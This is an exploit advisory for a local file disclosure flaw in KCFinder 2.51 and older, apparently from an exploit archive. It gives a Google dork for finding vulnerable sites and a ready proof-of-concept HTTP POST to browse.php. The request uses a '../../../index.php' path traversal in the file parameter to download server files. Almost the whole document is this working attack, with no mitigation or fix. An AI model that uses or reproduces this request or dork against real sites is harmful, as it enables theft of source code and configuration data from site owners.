22 lines
No EOL
727 B
Text
22 lines
No EOL
727 B
Text
---------------------------------------------------
|
|
# Exploit Title: KCFinder Local File Disclosure
|
|
# Author: DaOne
|
|
# Vendor Homepage: http://kcfinder.sunhater.com/
|
|
# Category: webapps/php
|
|
# Version: 2.51 + old versions
|
|
# Google dork: inurl:kcfinder/browse.php
|
|
---------------------------------------------------
|
|
|
|
[#] Tested on their own demo...
|
|
|
|
-PoC-
|
|
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
|
|
Host: server
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 51
|
|
|
|
dir=images/Photos+from+Bulgaria&file=../../../index.php |